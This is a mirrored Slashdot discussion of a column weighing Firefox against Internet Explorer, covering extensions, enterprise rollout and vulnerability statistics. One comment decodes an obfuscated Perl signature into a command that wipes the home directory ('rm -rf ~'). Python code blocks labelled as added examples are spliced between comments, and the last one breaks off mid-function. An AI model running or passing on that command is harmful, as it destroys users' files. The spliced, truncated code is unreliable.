Slashdot Mirror


Pros and Cons of Firefox Critically Evaluated?

A Dafa Disciple writes "Fred Langa of Information Week has written an article claiming to discuss the 'Pros and Cons of Firefox'. At first I was excited because I thought I was going to get to finally read an enlightening, in-depth article that critically examined the browser. I should have known better. Aside from the usual criticism of open source software, it contains a reference to a Symantec Internet Security Report which claims that more security vulnerabilities in the last six months of 2004 were found in Firefox than IE. I'll leave it to you to analyze Mr. Langa's opinion and scrutinize Symantec's study and reputation as a security software developer."

53 of 674 comments

  1. The biggest downside to Firefox by DeadSea · · Score: 4, Interesting


    Is all the plugins, extensions, chrome, files, and settings that have to be configured after you have the Firefox browser up and running. It would be really nifty to be able to bundle all the things that I do when I install firefox into one mega "extension bundle" or some such that I could install with one click.

    1. Re:The biggest downside to Firefox by Blaskowicz · · Score: 5, Interesting

      this extension should be useful:
      http://mozilla.doslash.org/infolister/
      InfoLister is an extension for Mozilla Firefox, Mozilla Thunderbird and Nvu that collects various information about Firefox/Thunderbird and saves it to a file. Currently it prints the list of installed extensions, themes and plugins.

    2. Re:The biggest downside to Firefox by meisenst · · Score: 5, Insightful

      -Have to- install? I downloaded one additional theme for Firefox and apart from the occasional plugin such as Shockwave, I never have to do anything to enhance Firefox for daily use.

      It's nice that you have everything worked out -- but this is like saying that Internet Explorer is as much of a hassle because of all those security updates you have to download. No thanks.

      --
      Green's Law of Debate: Anything is possible if you don't know what you're talking about.
    3. Re:The biggest downside to Firefox by Eyeball97 · · Score: 5, Insightful
      ???

      Why is this a "downside"?

      Would you prefer a 50Mb download, with 45Mb of stuff you don't ever need or use, or a 4Mb download where you can optionally add bits you want?

      Not everybody wants "chrome" (or themes), Flash, etc etc.

      Personally I love the lean approach, with the ability to add and tweak stuff that I want over the bloated, switch off all the crap you don't want approach...

    4. Re:The biggest downside to Firefox by Zocalo · · Score: 5, Interesting

      Perhaps some kind of "shopping basket" download system on the Mozilla update site would be a good way to go. Personally, I quite like the "Download Basket" that Microsoft uses on its Windows Update site when you do a manual update. Something like a standard shopping cart to choose the plugins that you are interested in, followed by a Windows Update style confirmation and install process would be ideal. If you could also save the baskets and reuse them on multiple PCs that would make widescale deployment of Firefox sooo much easier...

      --
      UNIX? They're not even circumcised! Savages!
    5. Re:The biggest downside to Firefox by ikkonoishi · · Score: 4, Informative

      They have that.

      It's called mozilla.

      Firefox is mozilla with most of the extra stuff besides the browser cut out.

    6. Re:The biggest downside to Firefox by sterno · · Score: 4, Insightful

      You mean the shopping basket that always tells me that most of the updates I want have to be downloaded and installed separately? :)

      --
      This sig has been temporarily disconnected or is no longer in service
    7. Re:The biggest downside to Firefox by FreeLinux · · Score: 5, Insightful

      I'd prefer the 50 megger with all the plugins that my users would likely need as well as all the necessary performance tweaks, proxy settings, policy settings and anything else I can't think of right this minute.

      Oh, I'd also like it in the form of an MSI so that I can roll it out to 1,000 systems at a time via script or GPO.

      You see there are users out there besides home users and their requirements are a little different than your own.

    8. Re:The biggest downside to Firefox by steeleye_brad · · Score: 4, Interesting

      Urg...I know people will hate me for posting this...but look at Opera. Without Java, the install file is about 4MB. This includes a mail reader, IRC client, newsgroup reader, mouse gestures, and highly configurable tabbed browsing. I see no reason for Firefox to toss in a few basic features. While I think Firefox is great, and I love the "feel" to it, I dislike downloading plugins for mouse gestures, tabbed browsing configuration, etc. Hell, basic plugins like this aren't large at all, it wouldn't hurt Firefox to put that in. Most people here aren't asking for hundreds of pre-installed plugins and a ton of themes, just some of the simpler things.

      I like the ideas posted by others, have a shopping cart or checkbox system, allowing you to sort of preinstall various plugins. Maybe create some standardized basic functionality plugins that one may choose to download, and have an option for popular, more advanced plugins as well. You'll still have a small initial download, and will still have the option to have a very small browser.

    9. Re:The biggest downside to Firefox by muckdog · · Score: 4, Insightful

      Just to point it out, most of the major plugins like flash, acrobat, java, quicktime, realplayer are all ones you have to download separately with IE as well. People that have IE, switch to Firefox and complain about the plugins not being there are forgetting that they had to do this in the past.

    10. Re:The biggest downside to Firefox by 0racle · · Score: 5, Insightful

      Create the site specific Firefox + Extensions environment and roll a MSI package yourself. 2000 Server and possibly Professional come with the tools to do this, chances are they are in 2003 as well. Do you really expect Mozilla to create a site specific MSI for you?

      --
      "I use a Mac because I'm just better than you are."
    11. Re:The biggest downside to Firefox by cloudmaster · · Score: 5, Informative

      Firefox's "install" consists of one directory. Copied to many machines. The configuration consists of one file stored in a user's profile. The distribution of both is easily automated without requiring the use of an MSI.

      Plugins, BTW, are also in that folder in the user's profile. You know, the one that's stored on a central server in your large network? Just set up firefox once on a test machine, and copy the firefox profile folder to each user's windows profile, then distribute the program files however you prefer to do that kind of thing.

      This can't be the first program with a non-MSI install method that an admin of a large network has encountered...

    12. Re:The biggest downside to Firefox by Eyeball97 · · Score: 4, Insightful
      Interesting perspective, but someone who wants to roll it out to 1000 systems at a time is hardly your "typical" user either?

      I can see and appreciate why you'd want all the tools necessary to make that easier.

      As others have already pointed out too, I like the "shopping basket" style of download too, something they should seriously consider implementing...

      When I was an ISP we used to roll out customised IE using the IEAK, wondering if there's anything like that for Mozilla/Firefox that would do the job for you.

      Failing that, there are a number of tools for mass rollout deployments such as you suggest (which you're probably already considerably more aware of than me if you're working in a 1,000 user environment) so I'm not sure I see what the problem is, aren't you already using such tools?

    13. Re:The biggest downside to Firefox by cicho · · Score: 4, Insightful

      Download size is not an issue. My problem (I use Firefox exclusively) is that I am reluctant to upgrade, because I know some of the extensions I use won't be available for the new version. Indeed this is what caused me to move from Mozilla to Firefox about a year ago - I was fed up with having to use an old build because a few extensions I needed weren't being upgraded to match new releases. Now I'm still using FF 0.9, same reason.

      Release notes for the latest 1.03 still insist you need to remove the previous version first and the installer disables all extensions. I pass. IMO a 1.x codebase should be mature and stable enough to be installed over an existing earlier version.

      --
      "Only the small secrets need to be protected. The big ones are kept secret by public incredulity." - Marshall McLuhan
    14. Re:The biggest downside to Firefox by S.O.B. · · Score: 5, Funny

      You also have to create a shortcut

      Well that just blows your TCO. Better go back to IE.

      --
      Some of what I say is fact, some is conjecture, the rest I'm just blowing out my ass...you guess.
    15. Re:The biggest downside to Firefox by bubkus_jones · · Score: 5, Insightful

      Because then you'll constantly get the "An additional plugin is required to view all the content on this page" popup/window/alert every time you go to a site that uses flash.

      So if you can live with that, don't install flashblock.

    16. Re:The biggest downside to Firefox by neithian · · Score: 4, Informative

      I assume ListZilla does the same thing? Perhaps better?

  2. symantec by rizzo420 · · Score: 5, Insightful

    i have begun to doubt symantec's expertise. i work in a college where virus outbreaks are pretty common. now i've seen a computer with the most up to date, newest version of norton/symantec anti-virus and it seems that it still does not find all the viruses. viruses and trojans that are relatively harmful to the system. i would take this story with a grain of salt...

    --
    please me, have no regrets.
    1. Re:symantec by jim_v2000 · · Score: 5, Informative

      I used to work for Symantec's tech support (used to--now Mike in India handles it) and the official line that we gave customers when they get a virus that Norton didn't detect was "Wait for the new definition file...it comes out next Wednesday." And when Norton wouldn't get rid of a virus, the line was "Norton Antivirus is a detection tool, not a removal tool." Which is total BS. If you read their website, the advertising for Norton AntiVirus says "Removes Viruses". That always troubled me, and I'm actually glad to be working elsewhere now.

      I personally run Grisoft's AVG for free, and Zone Alarm, and not only have I never had a virus/worm, they run a zillion times faster than Norton AntiVirus and Personal Firewall.

      Symantec makes bloatware that doesn't work well. Avoid it like the plague.

      --
      Don't take life so seriously. No one makes it out alive.
    2. Re:symantec by LnxAddct · · Score: 5, Informative

      This says it all. Not only has Firefox had 1/7 the vulnerabilities of IE, but those that it did have were patched quicker and were of less severity in most cases.
      Regards,
      Steve

  3. Sorry but... by hanssprudel · · Score: 5, Funny

    At first I was excited because I thought I was going to get to finally read an enlightening, in-depth article that critically examined the browser.

    And I thought my life was dull. You need help my friend. Now!

  4. timeframe of patches by rizzo420 · · Score: 4, Insightful

    one question should be asked... who releases patches and security updates in a more timely manner? mozilla or microsoft? while firefox may have had more security flaws than IE, it gets patched almost immediately.

    --
    please me, have no regrets.
  5. Print Version of the Article by Anonymous Coward · · Score: 5, Informative

    Print version of the article fitting nicely onto one page.

  6. In other news...Firefox 1.0.3 released by nacks1 · · Score: 5, Informative

    It's a little odd that this article would be posted without a note that Firefox 1.0.3 has just been released: http://www.mozilla.org/products/firefox/releases/1.0.3.html

  7. Re:GPO Control by numbski · · Score: 5, Interesting

    http://www.frontmotion.com/Firefox/

    Have you tried this by chance?

    I haven't personally, but I keep hearing good things about it.

    --

    Karma: Chameleon (mostly due to the fact that you come and go).

  8. Re:Enlightening... by lpp · · Score: 5, Insightful

    Disregarding the validity of the position, apparently the OP felt that the cons were based largely on positions already proven false. As a result, enlightenment in this case would have been based on cons based on results considered less inflammatory.

    Assuming the OP truly was not looking for a 'yes man' style of article, it is reasonable to believe a review detailing true failings of Firefox without resorting to questionable statistics would have met the requirements for 'enlightenment'.

  9. Firefox eased my pain by jimboisbored · · Score: 5, Informative

    I used to run adaware with IE, I've run it once in a while since I switched to firefox and it'll occasionally find a cookie or two that doesn't bother me. With IE it'd find a couple hundred problems.
    Security vulnerabilities my ass.
    (yes I know spyware and security is different, but firefox sure is a lot less of a pain in the ass)

  10. A few good (pieces of software) by Lead+Butthead · · Score: 5, Funny

    "You can't handle the truth! Son, we live in a world that has (fire) walls. And those walls have to be guarded by men with (antivirus software.) Who's gonna do it? You? ... I have a greater responsibility than you can possibly fathom. You weep for (FireFox) and you curse (Microsoft.) You have that luxury. You have the luxury of not knowing what I know: that (IE6.0 vulnerabilities,) while tragic, probably saved lives. And my existence, while grotesque and incomprehensible to you, saves lives...You don't want the truth. Because deep down, in places you don't talk about at parties, you want me on that wall. You need me on that (fire) wall."

    --
    ELOI, ELOI, LAMA SABACHTHANI!?
  11. Quick summary by nizo · · Score: 5, Funny
    Pros: It isn't explorer*
    Cons: It isn't explorer**


    *potentially more secure
    **some pages don't render right since some people only test with explorer

  12. Re:Mod Parent Down-Malicious Perl Code in Sig by Chicane-UK · · Score: 4, Funny

    You've got what's coming to you if you just copy and paste, and then run random code that you found on the internet quite frankly.

    --
    "Hey! Unless this is a nude love-in, get the hell off my property!!"
  13. Re:Enlightening... by Rahga · · Score: 5, Insightful

    Just because it's critical doesn't mean it's enlightening. I could give my five year old daughter a stack of printouts detailing vulnerabilities found by group XYZ, and in a second she can tell you which stack was bigger and might even count them out if she felt inclined to. That's not enlightening... What matters is quality, not quantity.

    Also, anybody can get access to the source of Firefox, while IE doesn't have publicly viewable source code. Comparing vulnerabilities among the two browsers is an apples and oranges affair thanks to this.

  14. Critical? Pfft... i've seen better. by Spy+der+Mann · · Score: 5, Insightful

    I assume you haven't RTFA, but here's more or less the criticism that Firefox gets:

    1) "Oh look! It has more vulnerabilities than IE!" (tho they fail to state how critical these are. And don't forget that Firefox 1.03 was just released, fixing these. How long it took IE to release theirs?)

    and 2) "BWA! Firefox fails to render my favorite IE-only pages!" complains from users.

    And that was on the last 1 1/2 pages. The others were just straw words (your usual columnist intro).

    This columnist isn't enlightening, nor critical. He's just giving another misinformed opinion.

    1. Re:Critical? Pfft... i've seen better. by Ripley · · Score: 5, Insightful

      "Oh look! It has more vulnerabilities than IE!"

      The quoted report was based on the last six months of 2004. Firefox 1.0 was officially released on November 9, 2004 http://mozillazine.org/articles/article5513.html. So, the product was still in beta for four of the months covered by the report. Without further details from the report, it's impossible to say how many vulnerabilities were in Firefox when it was considered ready for production end-user use.

  15. It's quite possible there are more bugs in Firefox by rben · · Score: 4, Insightful

    Firefox is still under active development. It's not surprising that occasionally a new bug, including ones that compromise security will be introduced. IE, on the other hand, has been unchanged, aside from bug fixes. All development work on IE was stopped until Firefox forced their hand. I don't think there have yet been any new releases of IE since Service Pack 2, which put 6.0.2900.2180 out in the world.

    So, I wouldn't be surprised if more new security problems were located in Firefox in the recent past than in IE during the same time period. That doesn't imply that there are fewer problems in IE than in Firefox, just that fewer were found in a given time period.

    Which means.... practically nothing. The relevant information would be total numbers of security problems over the total number of lines of code or some similar metric, if you want to discuss the quality of the code.

    If you want to know which browser is the most secure, you should look at the total number of security bugs known to exist and the severity of those bugs.

    For my money, Firefox is the only browser that I trust. I run IE only when I have no choice and when that happens I send an email to the manager of the site telling them why I won't visit again.

    Microsoft abandoned good engineering practices in order to grab at market share. As a result, they crippled both their browser and their operating system.

    --

    -All that is gold does not glitter - Tolkien
    www.ra

  16. Same old "more people use it" analogy... by Anonymous Coward · · Score: 4, Insightful

    And the more people use it, the more it's gonna get targeted.

    Just because more people drive cars than armoured vans, doesn't mean that cars are targeted more just because they're greater in number. In fact, the payload would be greater attacking armoured cars. In reality, some things are just designed with greater security in mind, from the offset.

  17. Issues with numbers by ppz003 · · Score: 5, Interesting
    <rant>
    I have an issue with people who quote numbers of security notices and the like. They always seem to fail to mention the average severity of these notices or even account for duplicates.

    We see a large number of nitpick vulnerabilities for open source because everyone can look at the source code and try to break it every which way. OTOH, finding exploits in IE is done by testers and hackers.

    Regarding dupes, visiting Secunia shows many vulnerabilities for linux distros, but you see the same ones over and over again for each distribution.

    So while I agree that no software is perfect, and Firefox does have problems that arise from time to time, as does any software, I'll still be using the fox for my net browsing.

    As for those testimonies in the article from people who can't get Firefox or Thunderbird working properly, wow. I've switched people's grandparents with no computer literacy with no problem. All I can say is that their system must be jacked up.
    </rant>
  18. If Firefox is as by g0bshiTe · · Score: 4, Insightful
    iffy a program as IE then how come in 5 years of using Mozilla based browsers ( on Windows ) have I not been befuddled with the plethora of malware ( autodownloaders, backdoor spyware, ad nauseum ) products that friends using IE receive? He can say "it's the userbase" till he turns blue in the face, I wanna know why when I go to a site using IE I immediately get inundated with BHO's yet in a Mozilla based browser they get shrugged off? Yet it is just as unsafe as IE states the author?

    In my opinion of using the software as long as I have, I would never use IE again unless forced to. And that small amount of time I do use IE, I spend twice as much afterwards cleaning out the damn mess made by malware.

    I think because of its Open Source nature when Moz or some derivative gains market share and becomes the primary target of ad companies, it still won't make that much of an impact on the browser as a whole.
    Given enough eyes all bugs are shallow
    --
    I am Bennett Haselton! I am Bennett Haselton!
  19. Oh yeah... by jim_v2000 · · Score: 5, Interesting

    A lot of other security/AV companies get definitions out MUCH faster than Symantec. I remember occasionally using Sophos's and other AV sites to solve virus issues because we didn't have the info.

    --
    Don't take life so seriously. No one makes it out alive.
  20. One page view - no ads by mrklin · · Score: 4, Informative
  21. Langa assumes IE is the Standard by DumbSwede · · Score: 4, Insightful
    One of the main things Langa complains about in his article is that some websites do not render properly under Firefox. Of course these sites are probably using IE proprietary extensions and not W3C suggested standards. So Firefox is broken in his eyes, because it fails to follow Microsoft's hijacking of HTML standards.

    I have found Firefox to be more logical looking in its layout using CSS elements and have had to rework pages more often for IE than the other way around. The problem is that many websites don't bother to check the look of a page in anything other than IE. So how is this FireFox's fault? Langa just assumes IE is getting it right and that there is no ambiguity in the way some HTML elements are specified.

    In theory there may be more bugs and possible security threats lying in wait in FireFox, but here is the thing, since switching to FireFox I have had FAR fewer virus problems. Now it could just be the smaller market thing, but so what - what I care about is how many real viruses I am exposed to. You could argue that should FireFox continue to grow in popularity, so will the attacks on it by virus writers, bringing it back to parity with IE. That may be, but hasn't happened yet. BUT it could just be that the open software model means more work on the code and better more secure code when it gains an even wider audience. In fact this is the horse I would bet on.

  22. No Yahoo Logo? by chill · · Score: 5, Informative

    I read the comment about Firefox not displaying the Yahoo logo and I couldn't believe it. Then, I popped over to Yahoo.com and sure enough, no logo.

    A quick check of the source told me what was going on. I recognized the yimg URL as one that I had *BLOCKED* images from long ago. Yahoo serves tons of graphics ads all over the Internet and I just blocked them all using Firefox's native ability to block images from a particular URL.

    It seems Yahoo serves their own graphics from the same server as their ads. Silly rabbit.

    So, it isn't a rendering bug with Firefox, it is a feature! And a damned useful one at that.

    feature + ignorance = bug? Sad.

    -Charles

    --
    Learning HOW to think is more important than learning WHAT to think.
  23. Re:Con: You can't use autocomplete by SnprBoB86 · · Score: 5, Insightful

    "Or should the Fx developers be forced to protect you from your own carelessness?"

    Yes. I should not have to know a damn thing about computers in order to protect my information.

    Granny buys something online and sees that auto complete can save her time next time. She won't stop to think about how it works if she even stops to read anything at all before clicking "yes" to the "would you like to use auto complete" dialog.

    All auto complete information should be encrypted. No excuses.

    --
    http://brandonbloom.name
  24. Re:Mod Parent Down-Malicious Perl Code in Sig by daniel+de+graaf · · Score: 5, Informative

    $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see

    Adding whitespace

    ($?) ? s:;s:s;;$?:
    : s;;=]=>%-{<-|}<&|`{; ;
    y; -/:-@[-`{-};`-{~" -; ;

    s;;$_;see

    $? is equal to zero normally, so that's the same as
    s//=]=>%-{<-|}<&|`{/;
    y/ -\/:-@[-`{-}/`-{~" -/;
    s//$_/see

    The first statement => $_ = '=]=>%-{<-|}<&|`{';
    second translates $_ to 'system"rm -rf ~"'
    third: eval $_
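
Added example, not part of the comment above: the same decoding done statically in Python, so the signature can be inspected without handing it to a Perl interpreter. The function names and the small pattern list in `RISKY` are assumptions made for this illustration; the ciphertext and the two `y///` lists are the ones quoted in the comment.

```python
"""Statically decode a Perl y/// (tr///) layer and triage the result. Nothing is executed."""
import re


def expand_tr_list(spec: str) -> str:
    """Expand a Perl tr/// list: 'a-c' -> 'abc'; a backslash makes the next char literal."""
    # Resolve escapes first so an escaped delimiter (e.g. \/) can still end a range.
    tokens = []
    i = 0
    while i < len(spec):
        if spec[i] == "\\" and i + 1 < len(spec):
            tokens.append((spec[i + 1], True))
            i += 2
        else:
            tokens.append((spec[i], False))
            i += 1

    out = []
    i = 0
    while i < len(tokens):
        start = tokens[i][0]
        # An unescaped '-' with a character on both sides is a range; a trailing '-' is literal.
        if i + 2 < len(tokens) and tokens[i + 1] == ("-", False):
            end = tokens[i + 2][0]
            if ord(end) < ord(start):
                raise ValueError(f"invalid range {start!r}-{end!r}")
            out.extend(chr(c) for c in range(ord(start), ord(end) + 1))
            i += 3
        else:
            out.append(start)
            i += 1
    return "".join(out)


def perl_tr(text: str, search: str, replacement: str) -> str:
    """Apply y/search/replacement/ to text the way Perl does, without modifiers."""
    src = expand_tr_list(search)
    dst = expand_tr_list(replacement) or src      # empty replacement maps to itself
    if len(dst) < len(src):                       # short replacement: last char repeats
        dst += dst[-1] * (len(src) - len(dst))
    table = {}
    for s, d in zip(src, dst):
        table.setdefault(s, d)                    # first mapping wins on duplicates
    return "".join(table.get(ch, ch) for ch in text)


# Values quoted in the comment above.
CIPHERTEXT = "=]=>%-{<-|}<&|`{"
SEARCH = r" -\/:-@[-`{-}"
REPLACEMENT = '`-{~" -'

# Hypothetical triage patterns for decoded text (an assumption, not an exhaustive list).
RISKY = {
    "shell-exec": re.compile(r"\b(?:system|exec)\b|`"),
    "recursive-delete": re.compile(r"\brm\s+-\w*r\w*\b"),
    "home-dir-target": re.compile(r"~|\$HOME"),
}


def decode_sig() -> str:
    """Return the string the signature would pass to eval, without evaluating it."""
    return perl_tr(CIPHERTEXT, SEARCH, REPLACEMENT)


def triage(decoded: str) -> list:
    """Name every risky construct found in the decoded text."""
    return sorted(name for name, rx in RISKY.items() if rx.search(decoded))


if __name__ == "__main__":
    decoded = decode_sig()
    print(decoded)
    print(triage(decoded))
```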

  25. Exploits on the rise is interesting... by greed · · Score: 5, Insightful
    ...except that the links he gives are just to pages of reports, and I'm not sure which ones are worth reading.

    But, by writing off all of Internet Explorer's problems to the "installed base" scale factor is extremely dangerous to his readers.

    The problem being, since MSIE is embedded into the OS, a flaw in MSIE can be exploited from any program which uses an HTML viewer, not only the "iexplore.exe" application itself. Firefox, even when it's your default browser, still pops up in full "visiting the Web" paranoia.

    Another problem, of course, relates to MSIE's very strange handling of text/plain and application/octet-stream data types. (It will actually reject the Content-type: header from the server and make up a new one based on filename suffix and/or file content... imagine sending a text/plain file from a CGI URL that has ".doc" in it and it turning into a Word file. Note that the ".doc" is in the URL, not in the downloaded file name....) I've got a CGI I just can't make work with MSIE properly because it rejects my server's claim that file "foo.log" with "inline" presentation is type "text/plain" and it can display it--it insists on saving to disk... only to find out that Notepad is the right application. To work around it, I'd have to change the extra path information fed to the CGI... and I can't do that--it means something, of course.

    But that problem ("feature", if you read the MS knowledgebase) is one way how people are tricked into downloading seemingly "safe" content that turns dangerous.

    Plus, he makes no assessment of the security problems. He doesn't mention ANY, from ANY browser, not even as illustration--he just leaves it to the reader to plow through pages of cryptic reports from Symantec and CERT.

    And he's got no analysis of the "trouble reports" he provides for Firefox. Missing images? 99 times out of 100, that's because the Web page has backslashes in the IMG URLs--which are not part of the hierarchical URI syntax. (They work only in MSIE on Windows. MSIE for Macintosh will not process them the same way.)

    Plus... how do we really know what security problems are fixed in MSIE? On my XP box at home, and the W2K boxes I have to use at work, the Windows Updates just say things like, "A security problem could allow an attacker access to your computer." How am I to know what that security problem is, what part of the system it affects? I don't even know if it is function I use, or even have enabled--the update information is just too terse--and that's after clicking, "Show Details".

    (My main systems are Linux and Mac, so there may be a way to get more information from Windows Update, but it isn't as obvious... unlike Mac OS X Software Update, where it lists the major components right there, and links that take you to the Apple web site for more information.)

  26. easy to detect cc numbers by gad_zuki! · · Score: 4, Interesting

    Easy.

    1. Don't do autocomplete (or make this a default off option) on ssl forms.

    2. Credit card #'s are 16 digits with known prefixes. Detecting them isn't a difficult problem. Same with social security numbers.
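
Added example, not part of the comment above: a sketch of the two rules as a filter that decides whether a form value may be stored for autocomplete. The function names are hypothetical, the prefix list is a partial one chosen for illustration (Visa 4, MasterCard 51-55, Discover 6011), the Luhn checksum goes beyond what the comment describes, and the sample values in the usage section are constructed or well-known test numbers.

```python
"""Decide whether a submitted form value is safe to keep in autocomplete history."""
import re

# Partial list of 16-digit card prefixes (assumption for this example).
CARD_PREFIX = re.compile(r"^(?:4|5[1-5]|6011)")
SIXTEEN_DIGITS = re.compile(r"^\d{16}$")

# US social security number in its dashed form; the lookaheads drop ranges
# that are never issued (area 000, 666, 9xx; group 00; serial 0000).
SSN = re.compile(r"^(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}$")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: double every second digit from the right, sum, test mod 10."""
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = int(ch)
        if pos % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def looks_like_card(value: str) -> bool:
    """True for 16 digits (spaces or dashes allowed) with a known prefix and valid checksum."""
    digits = re.sub(r"[ -]", "", value.strip())
    if not SIXTEEN_DIGITS.match(digits):
        return False
    # The checksum keeps order numbers and other 16-digit ids from being misclassified.
    return bool(CARD_PREFIX.match(digits)) and luhn_ok(digits)


def looks_like_ssn(value: str) -> bool:
    """True for a value in AAA-GG-SSSS form within issued ranges."""
    return bool(SSN.match(value.strip()))


def autocomplete_decision(value: str, is_ssl_form: bool) -> tuple:
    """Return (store, reason). Rule 1: nothing from SSL forms. Rule 2: no card or SSN values."""
    if is_ssl_form:
        return (False, "ssl-form")
    if looks_like_card(value):
        return (False, "card-number")
    if looks_like_ssn(value):
        return (False, "ssn")
    return (True, "ok")


if __name__ == "__main__":
    samples = [                       # constructed inputs
        ("4111 1111 1111 1111", False),
        ("4111111111111112", False),
        ("123-45-6789", False),
        ("jane@example.com", True),
        ("Springfield", False),
    ]
    for value, ssl in samples:
        print(repr(value), ssl, autocomplete_decision(value, ssl))
```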

  27. Re:Enlightening... by Just+Some+Guy · · Score: 5, Funny
    I could give my five year old daughter a stack of printouts detailing vulnerabilities found by group XYZ, and in a second she can tell you which stack was bigger and might even count them out if she felt inclined to.

    My five year old daughter could prioritize them by severity and likelihood of exploit, add in a few of her own, and generate a patch that fixes them on the three most common platforms. What lame school are you sending your kids to?

    --
    Dewey, what part of this looks like authorities should be involved?
  28. Scared? Uninstall it. by ehiris · · Score: 4, Insightful

    If you're so afraid of its security vulnerabilities you can always uninstall FireFox. Can you do that with IE?

  29. Is Firefox the utopia of browsers? by metoc · · Score: 4, Insightful

    The article reads better if you consider it a response to the question "Will Firefox save me from the evils of the Internet?".

    The author pretty much buries IE and M$ on security, and then proceeds to remind us not to be too fast jumping to Firefox, as it isn't perfect either. It is fairly new as software goes and we will have to wait and see now that it has enough of an installed base to attract the cyber villains.

    If anything the author implied that you should walk, not run to Firefox and remember to apply your bug repellent.

    BTW. I use Firefox almost exclusively, and have watched as websites have slowly gotten around the pop-up blocker, and how 1.01 came out to block the multi-language DNS hack, which IE isn't vulnerable to because it is so old.

  30. Easy. Encryption. by jd · · Score: 4, Insightful

    Have each user account associated with an encryption key. That key is used to encrypt all auto-complete information. That way, auto-complete still works and doesn't need to know about credit card numbers (or about any other important type of data), but doesn't expose the information to unauthorized individuals.

    --
    It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
  31. Goes both ways. by Sylver+Dragon · · Score: 4, Insightful

    Having read the article, and also followed the author's advice to read the security bulletins, I found that the article is mostly bullshit, which stumbles upon lucid points occasionally, though I think this is mostly by accident.
    I didn't bother to do a count of items in the bulletins, as this is an utterly worthless metric. Nor do I agree that percentage of complaints is a worthwhile way to judge two competing products.
    Just to dispel that idea. Consider for a moment that in his example of 1000 users of A vs. 50 users of B, a 2 person anomaly would be a 0.2% shift in the numbers for A and a 4% shift in the numbers for B. That margin of error for product B is so large as to make the whole study worthless.
    On the other hand, of the items in the bulletins, Firefox did have some serious flaws, e.g. the kind that end in "would allow a malicious user to execute arbitrary code." So, the author is right that Firefox is not some panacea for security, he just fails to explain the real reason why.
    Now, is Firefox more secure overall? I haven't the slightest clue. I really don't have the time and or will to go through the bulletins, aggregate all of the flaws for each browser, assign a numerical value to each severity, and then come up with a score. I offer this idea to any of those who surf /. all day, have a desire to defend Firefox, and don't have a job.
    The author also brings up the old argument of, its not currently a target, so its more secure because of obscurity. I think this argument was valid, right up until Firefox hit 1.0. Before that, it was an obscure little browser which didn't get much attention. However, once it hit 1.0 it got a lot of press; and, the way I see it, this would have given a huge incentive for the black hats to start hitting Firefox, for the right to say that they had one of the first working exploits for this new browser. So, I think this argument falls apart.
    So, without a real study to backup and/or revoke the idea that Firefox is more secure than IE, the only thing I have to go on is antecdotal evidence. Right now I support about 100 computers. And, because of the way we do business, each user has administrative access to their own box (fun on a bun!). Now, because of this, I have a mix of IE users and Firefox users. For the most part, the computers which I am cleaning up spyware/adware on all of the time tend to be the IE user's computers. While I do have to do an occasional cleanup of a Firefox computer, the problems tend to come from other third party apps bundled with spyware, as opposed to the IE, browsed to the wrong page and got infected spyware.
    Does this mean Firefox is more secure? No, one factor, which I can't really rule out, is that the people who use Firefox also tend to be the more knowledgable computer users; so, they may simply be better at avoiding infection. As a counter example, our network engineer runs IE, and doesn't have a problem with spyware/adware, so maybe its just the person at the keyboard making the difference. But, still the preponderence of the evidence would suggest that the Firefox machines tend to be less infected, so there is some correlation, if not outright causation.
    One other thing, which helps keep me on Firefox, have you ever tried to re-install IE6 SP2? Fucking pain in the ass. Some spyware/adware will attach itself to the IE DLLs, and is near impossible to get rid of. Also, I have had more than one machine where the removal of the spyware/adware has broken the IE scripting engine. This is also ignoring that crapware that damages winsock as it gets removed. Thank <insert deity here> for the automated winsock repair tool.
    MS has made re-installing IE harder and harder as they have released updates. In IE5 I could do an add/remove programs on it, and get a reinstall out of it. In IE6 SP1, I could futz with the registry and get it to allow a re-install. Now that seems to be broken, as the MS recommended registry change to allow a reinstall seems to be broken. Th

    --
    Necessity is the mother of invention.
    Laziness is the father.
  32. every... single... fucking... time.... by sootman · · Score: 4, Insightful

    "...more security vulnerabilities in the last six months of 2004 were found in Firefox than IE..."

    WHO THE FUCK CARES?!?!? All these dumbass writers need to learn that all bugs are NOT created equal. There is a BIG ASS DIFFERENCE between "small flaw that could theoretically be exploited but the good guys found it first and fixed it in two days anyway" and "gaping hole in the default configuration with thousands of exploits in the wild for months on end." I mean, fucking A, how awesome is it to run Windows Update and see a warning like this? "Identified security issues in Internet Explorer could allow an attacker to compromise a Windows-based system... This affects all computers with Internet Explorer installed (even if you don't run Internet Explorer as your Web browser). [emphasis added]"

    Which would you rather live in: a city with a hundred arsonists or a thousand litterbugs?

    --
    Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
  33. Comparing Security by stretch0611 · · Score: 4, Interesting
    Wow you can actually compare a product that has not even been out for a year, and IE6 which has been out for over 3 years...

    Actually IE6 has now been out for 4 years. And a person should hope that a 4 year old product that is used by millions of people every day should have the bugs worked out of it by now.

    Now as far as how to compare them check out this article. It compares security on a very sound premise: If you keep up-to-date with updates how long are you vulnerable. The answer: IE: 51 weeks during 2004, Firefox: 8 Weeks during 2004.

    Let's rephrase that; using Firefox I was safe from known exploits 10 months last year. If I was an idiot and used IE, I was only safe from known exploits 1 lousy week during the whole year.

    Which are you going to choose? Get FireFox!

    --
    Looking for a job?
    Want your resume written professionally?
    DON'T USE TUNAREZ!!!
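
The metric cited in the comment above, time spent with at least one publicly known but unpatched flaw, can be computed from disclosure and patch dates by merging overlapping windows. This is an added Python example, not part of the comment or of the article it refers to; the function name, product labels and every date are constructed for illustration.

```python
from datetime import date

# Constructed sample data: (disclosed, patched) pairs for two hypothetical
# products. These are NOT real advisories. None = no patch in the period.
PRODUCT_A = [
    (date(2004, 1, 5), date(2004, 3, 1)),
    (date(2004, 2, 10), date(2004, 6, 15)),   # overlaps the first window
    (date(2004, 6, 15), date(2004, 12, 31)),  # opens the day the previous closes
]
PRODUCT_B = [
    (date(2004, 3, 1), date(2004, 3, 8)),
    (date(2004, 9, 20), date(2004, 10, 4)),
    (date(2004, 9, 25), None),                # still unpatched at period end
]
PERIOD_START = date(2004, 1, 1)
PERIOD_END = date(2005, 1, 1)  # exclusive


def exposed_days(windows, start, end):
    """Days in [start, end) on which at least one disclosed flaw had no patch.

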